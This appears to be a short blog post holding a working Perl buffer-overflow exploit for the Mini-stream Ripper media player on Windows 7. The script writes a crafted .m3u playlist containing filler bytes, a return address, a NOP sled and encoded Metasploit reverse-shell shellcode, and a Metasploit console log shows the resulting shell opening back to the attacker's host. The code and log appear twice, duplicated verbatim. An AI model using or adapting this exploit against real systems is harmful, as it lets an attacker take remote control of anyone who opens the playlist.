http://www.exploit-db.com/exploits/17744/ planted the seed, but I developed the code independently.
[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 4 opened (192.168.0.4:4444 -> 192.168.0.38:49178) at 2011-09-02 18:45:55 -0500
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Mini-stream\Mini-stream Ripper>systeminfo | find "OS Name"
systeminfo | find "OS Name"
OS Name: Microsoft Windows 7 Home Premium
C:\Program Files (x86)\Mini-stream\Mini-stream Ripper>
#!/usr/bin/perl
# mini-stream ripper windows 7 home premium direct ret overwrite
my $filler = "A" x 26100; # via msf3 pattern_create/offset
my $eip = "\x1b\x02\x04\x10"; # push esp, ret from MSRfilter01.dll (no aslr) -- found via mona.py
my $nops = "\x90" x 20;
# metasploit windows/shell_reverse_tcp, LHOST=192.168.0.4
# x86/shikata_ga_nai, badchars: \x00\x0a
my $shellcode =
"\xb8\x83\x92\x9f\xca\xda\xd6\xd9\x74\x24\xf4\x5b\x33\xc9" .
"\xb1\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x61\x67\x63" .
"\x22\xec\x88\x9c\xb3\x8e\x01\x79\x82\x9c\x76\x09\xb7\x10" .
"\xfc\x5f\x34\xdb\x50\x74\xcf\xa9\x7c\x7b\x78\x07\x5b\xb2" .
"\x79\xa6\x63\x18\xb9\xa9\x1f\x63\xee\x09\x21\xac\xe3\x48" .
"\x66\xd1\x0c\x18\x3f\x9d\xbf\x8c\x34\xe3\x03\xad\x9a\x6f" .
"\x3b\xd5\x9f\xb0\xc8\x6f\xa1\xe0\x61\xe4\xe9\x18\x09\xa2" .
"\xc9\x19\xde\xb1\x36\x53\x6b\x01\xcc\x62\xbd\x58\x2d\x55" .
"\x81\x36\x10\x59\x0c\x47\x54\x5e\xef\x32\xae\x9c\x92\x44" .
"\x75\xde\x48\xc1\x68\x78\x1a\x71\x49\x78\xcf\xe7\x1a\x76" .
"\xa4\x6c\x44\x9b\x3b\xa1\xfe\xa7\xb0\x44\xd1\x21\x82\x62" .
"\xf5\x6a\x50\x0b\xac\xd6\x37\x34\xae\xbf\xe8\x90\xa4\x52" .
"\xfc\xa2\xe6\x3a\x31\x98\x18\xbb\x5d\xab\x6b\x89\xc2\x07" .
"\xe4\xa1\x8b\x81\xf3\xc6\xa1\x75\x6b\x39\x4a\x85\xa5\xfe" .
"\x1e\xd5\xdd\xd7\x1e\xbe\x1d\xd7\xca\x10\x4e\x77\xa5\xd0" .
"\x3e\x37\x15\xb8\x54\xb8\x4a\xd8\x56\x12\xfd\xdf\xc1\x5d" .
"\x56\xdf\x15\x36\xa5\xdf\x04\x9a\x20\x39\x4c\x32\x65\x92" .
"\xf9\xab\x2c\x68\x9b\x34\xfb\xf8\x38\xa6\x60\xf8\x37\xdb" .
"\x3e\xaf\x10\x2d\x37\x25\x8d\x14\xe1\x5b\x4c\xc0\xca\xdf" .
"\x8b\x31\xd4\xde\x5e\x0d\xf2\xf0\xa6\x8e\xbe\xa4\x76\xd9" .
"\x68\x12\x31\xb3\xda\xcc\xeb\x68\xb5\x98\x6a\x43\x06\xde" .
"\x72\x8e\xf0\x3e\xc2\x67\x45\x41\xeb\xef\x41\x3a\x11\x90" .
"\xae\x91\x91\xa0\xe4\xbb\xb0\x28\xa1\x2e\x81\x34\x52\x85" .
"\xc6\x40\xd1\x2f\xb7\xb6\xc9\x5a\xb2\xf3\x4d\xb7\xce\x6c" .
"\x38\xb7\x7d\x8c\x69";
open(FILE, ">exp.m3u");
print FILE $filler.$eip.$nops.$shellcode;
[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 4 opened (192.168.0.4:4444 -> 192.168.0.38:49178) at 2011-09-02 18:45:55 -0500
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Mini-stream\Mini-stream Ripper>systeminfo | find "OS Name"
systeminfo | find "OS Name"
OS Name: Microsoft Windows 7 Home Premium
C:\Program Files (x86)\Mini-stream\Mini-stream Ripper>
#!/usr/bin/perl
# mini-stream ripper windows 7 home premium direct ret overwrite
my $filler = "A" x 26100; # via msf3 pattern_create/offset
my $eip = "\x1b\x02\x04\x10"; # push esp, ret from MSRfilter01.dll (no aslr) -- found via mona.py
my $nops = "\x90" x 20;
# metasploit windows/shell_reverse_tcp, LHOST=192.168.0.4
# x86/shikata_ga_nai, badchars: \x00\x0a
my $shellcode =
"\xb8\x83\x92\x9f\xca\xda\xd6\xd9\x74\x24\xf4\x5b\x33\xc9" .
"\xb1\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x61\x67\x63" .
"\x22\xec\x88\x9c\xb3\x8e\x01\x79\x82\x9c\x76\x09\xb7\x10" .
"\xfc\x5f\x34\xdb\x50\x74\xcf\xa9\x7c\x7b\x78\x07\x5b\xb2" .
"\x79\xa6\x63\x18\xb9\xa9\x1f\x63\xee\x09\x21\xac\xe3\x48" .
"\x66\xd1\x0c\x18\x3f\x9d\xbf\x8c\x34\xe3\x03\xad\x9a\x6f" .
"\x3b\xd5\x9f\xb0\xc8\x6f\xa1\xe0\x61\xe4\xe9\x18\x09\xa2" .
"\xc9\x19\xde\xb1\x36\x53\x6b\x01\xcc\x62\xbd\x58\x2d\x55" .
"\x81\x36\x10\x59\x0c\x47\x54\x5e\xef\x32\xae\x9c\x92\x44" .
"\x75\xde\x48\xc1\x68\x78\x1a\x71\x49\x78\xcf\xe7\x1a\x76" .
"\xa4\x6c\x44\x9b\x3b\xa1\xfe\xa7\xb0\x44\xd1\x21\x82\x62" .
"\xf5\x6a\x50\x0b\xac\xd6\x37\x34\xae\xbf\xe8\x90\xa4\x52" .
"\xfc\xa2\xe6\x3a\x31\x98\x18\xbb\x5d\xab\x6b\x89\xc2\x07" .
"\xe4\xa1\x8b\x81\xf3\xc6\xa1\x75\x6b\x39\x4a\x85\xa5\xfe" .
"\x1e\xd5\xdd\xd7\x1e\xbe\x1d\xd7\xca\x10\x4e\x77\xa5\xd0" .
"\x3e\x37\x15\xb8\x54\xb8\x4a\xd8\x56\x12\xfd\xdf\xc1\x5d" .
"\x56\xdf\x15\x36\xa5\xdf\x04\x9a\x20\x39\x4c\x32\x65\x92" .
"\xf9\xab\x2c\x68\x9b\x34\xfb\xf8\x38\xa6\x60\xf8\x37\xdb" .
"\x3e\xaf\x10\x2d\x37\x25\x8d\x14\xe1\x5b\x4c\xc0\xca\xdf" .
"\x8b\x31\xd4\xde\x5e\x0d\xf2\xf0\xa6\x8e\xbe\xa4\x76\xd9" .
"\x68\x12\x31\xb3\xda\xcc\xeb\x68\xb5\x98\x6a\x43\x06\xde" .
"\x72\x8e\xf0\x3e\xc2\x67\x45\x41\xeb\xef\x41\x3a\x11\x90" .
"\xae\x91\x91\xa0\xe4\xbb\xb0\x28\xa1\x2e\x81\x34\x52\x85" .
"\xc6\x40\xd1\x2f\xb7\xb6\xc9\x5a\xb2\xf3\x4d\xb7\xce\x6c" .
"\x38\xb7\x7d\x8c\x69";
open(FILE, ">exp.m3u");
print FILE $filler.$eip.$nops.$shellcode;
No comments:
Post a Comment